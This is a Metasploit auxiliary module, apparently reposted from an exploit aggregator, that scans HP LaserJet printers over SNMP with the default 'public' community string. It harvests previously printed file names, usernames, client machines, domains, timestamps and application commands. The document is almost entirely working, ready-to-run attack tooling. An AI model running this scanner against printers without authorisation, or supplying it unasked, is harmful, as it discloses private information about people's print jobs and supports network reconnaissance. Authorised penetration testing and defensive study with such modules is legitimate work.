Share
## https://sploitus.com/exploit?id=PACKETSTORM:180920
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SNMPClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'HP LaserJet Printer SNMP Enumeration',
'Description' => %q{
This module allows enumeration of files previously printed.
It provides details as filename, client, timestamp and username information.
The default community used is "public".
},
'References' =>
[
[ 'URL', 'https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol' ],
[ 'URL', 'https://net-snmp.sourceforge.io/docs/man/snmpwalk.html' ],
[ 'URL', 'http://www.nothink.org/codes/snmpcheck/index.php' ],
[ 'URL', 'http://www.securiteam.com/securitynews/5AP0S2KGVS.html' ],
[ 'URL', 'http://stuff.mit.edu/afs/athena/dept/cron/tools/share/mibs/290923.mib' ],
],
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
'License' => MSF_LICENSE
))
end
def run_host(ip)
begin
snmp = connect_snmp
vprint_status("Connecting to #{ip}")
output_data = []
output_data << "IP address : #{ip}"
sysName = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s
output_data << "Hostname : #{sysName.strip}"
sysDesc = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s
sysDesc.gsub!(/^\s+|\s+$|\n+|\r+/, ' ')
output_data << "Description : #{sysDesc.strip}"
sysContact = snmp.get_value('1.3.6.1.2.1.1.4.0').to_s
output_data << "Contact : #{sysContact.strip}" if not sysContact.empty?
sysLocation = snmp.get_value('1.3.6.1.2.1.1.6.0').to_s
output_data << "Location : #{sysLocation.strip}" if not sysLocation.empty?
output_data << ""
snmp.walk([
"1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.1", # job-info-name1 - document name1
"1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.2", # job-info-name2 - document name2
"1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.1", # job-info-attr-1 - username
"1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.2", # job-info-attr-2 - machine name
"1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.3", # job-info-attr-3 - domain (?)
"1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.4", # job-info-attr-4 - timestamp
"1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.6", # job-info-attr-6 - application name
"1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.7", # job-info-attr-7 - application command
]) do |name1,name2,username,client,domain,timestamp,app_name,app_command|
filename = name1.value.to_s + name2.value.to_s
if (username.value.to_s !~ /noSuchInstance/)
if username.value.to_s =~ /^JobAcct(\d+)=(.*)/
username = $2
end
else
username = ''
end
if (client.value.to_s !~ /noSuchInstance/)
if client.value.to_s =~ /^JobAcct(\d+)=(.*)/
client = $2
end
else
client = ''
end
if (domain.value.to_s !~ /noSuchInstance/)
if domain.value.to_s =~ /^JobAcct(\d+)=(.*)/
domain = $2
end
else
domain = ''
end
if (timestamp.value.to_s !~ /noSuchInstance/)
if timestamp.value.to_s =~ /^JobAcct(\d+)=(.*)/
timestamp = $2
end
else
timestamp = ''
end
if (app_name.value.to_s !~ /noSuchInstance/)
if app_name.value.to_s =~ /^JobAcct(\d+)=(.*)/
app_name = $2
end
else
app_name = ''
end
if (app_command.value.to_s !~ /noSuchInstance/)
if app_command.value.to_s =~ /^JobAcct(\d+)=(.*)/
app_command = $2
end
else
app_command = ''
end
if not timestamp.empty?
output_data << "File name : #{filename}"
output_data << "Username : #{username}" if not username.empty?
output_data << "Client : #{client}" if not client.empty?
output_data << "Domain : #{domain}" if not domain.empty?
output_data << "Timestamp : #{timestamp}" if not timestamp.empty?
output_data << "Application : #{app_name} (#{app_command})" if not app_name.empty?
output_data << ""
end
end
output_data.each do |row|
print_good("#{row}")
end
disconnect_snmp
rescue SNMP::RequestTimeout
print_error("#{ip}, SNMP request timeout.")
rescue Errno::ECONNREFUSED
print_error("#{ip}, Connection refused.")
rescue SNMP::InvalidIpAddress
print_error("#{ip}, Invalid IP Address. Check it with 'snmpwalk tool'.")
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("#{ip}, Unknown error: #{e.class} #{e}")
end
end
end